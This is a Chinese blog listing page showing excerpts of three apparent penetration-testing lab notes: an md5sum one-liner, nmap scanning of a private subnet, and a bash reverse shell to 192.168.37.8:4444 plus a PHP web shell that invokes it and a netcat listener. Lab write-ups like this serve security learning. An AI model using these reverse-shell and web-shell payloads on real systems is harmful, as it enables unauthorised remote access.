摘要:
md5 -n必要有 echo -n 'asdf' | md5sum | awk -F ' ' '{print $1}' 阅读全文
posted @ 2024-07-04 16:22
crabin88
阅读(16)
评论(0)
推荐(0)
摘要:
信息收集nmap sudo nmap -sn 192.168.37.0/24 sudo nmap -sT --min-rate 1000 -p- 192.168.37.7 -oA nmapscan/ports ports=$(grep open nmapscan/ports.nmap | awk - 阅读全文
posted @ 2024-07-04 16:22
crabin88
阅读(44)
评论(0)
推荐(0)
摘要:
/bin/bash -i >& /dev/tcp/192.168.37.8/4444 0>&1 <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.8/4444 0>&1'"); ?> sudo nc lvnp 4444 whoami s 阅读全文
posted @ 2024-07-04 16:22
crabin88
阅读(42)
评论(0)
推荐(0)

浙公网安备 33010602011771号